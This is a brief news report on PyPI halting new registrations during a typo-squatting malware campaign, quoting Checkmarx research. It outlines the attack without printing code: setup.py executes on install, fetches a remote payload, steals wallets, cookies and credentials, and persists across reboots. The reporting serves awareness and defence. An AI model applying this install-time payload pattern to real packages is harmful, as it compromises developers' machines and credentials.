Maintainers of the Python Package Index (PyPI) repository were forced to suspend new project creation and new user registration on Thursday to mitigate a worrisome malware upload campaign.
The confirmation of the PyPI incident, which has since been resolved, comes as security researchers at Checkmarx warn that multiple malicious Python packages are being pushed via typo-squatting techniques.
“This is a multi-stage attack and the malicious payload aimed to steal crypto wallets, sensitive data from browsers (cookies, extensions data, etc..) and various credentials. In addition, the malicious payload employed a persistence mechanism to survive reboots,” Checkmarx said in a research note.
Earlier this week, the company said it spotted multiple malicious Python packages being uploaded on the Python Package Index (PyPI) and noted that these packages most likely were created using automation tools.
“The malicious code is located within each package’s setup.py file, enabling automatic execution upon installation,” Checkmarx explained. “Upon execution, the malicious code within the setup.py file attempted to retrieve an additional payload from a remote server. The URL for the payload was dynamically constructed by appending the package name as a query parameter.”
The end result is an info-stealer designed to harvest sensitive information from the victim’s machine and a persistence mechanism to ensure it remained active on the compromised system even after the initial execution.
“The discovery of these malicious Python packages on PyPI highlights the ongoing nature of cybersecurity threats within the software development ecosystem. This incident is not an isolated case, and similar attacks targeting package repositories and software supply chains are likely to continue,” the company warned.
Related: PyPI Packages Found to Expose Thousands of Secrets
Related: Malicious macOS PyPI, NPM Packages Targeting macOS
Related: PyPI Enforcing 2FA for Project Maintainers to Boost Security
Related: Malicious NPM, PyPI Packages Stealing User Information
